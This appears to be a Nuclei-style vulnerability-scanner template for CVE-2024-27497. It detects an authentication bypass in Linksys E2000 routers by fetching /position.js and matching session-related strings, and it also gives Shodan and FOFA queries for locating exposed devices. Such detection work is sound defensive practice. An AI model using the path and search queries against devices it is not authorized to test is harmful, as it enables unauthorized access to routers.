id: CVE-2024-27497

info:
  name: Linksys E2000 1.0.06 position.js Improper Authentication
  author: DhiyaneshDk
  severity: high
  description: |
    Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.
  impact: |
    Successful exploitation could lead to unauthorized access to the device.
  remediation: |
    Upgrade to a patched version of the firmware to mitigate the vulnerability.
  reference:
    - https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27497
    - https://github.com/Ostorlab/KEV
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    epss-score: 0.00053
    epss-percentile: 0.21091
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Linksys E2000 WAP http config"
    fofa-query: app="LINKSYS-E2000"
  tags: cve,cve2024,linksys,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/position.js"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var session_key"
          - "close_session"
          - "HELPPATH"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e4936d0fd84129eecdfee7a38aa9de3caa8762786a638a73b43d8fc20583b3f6022057b4fded6f9512301986e03a11f90d0b093fe24bd419897fd20bfa2f81e1e98a:922c64590222798bb761d5b6d8e72950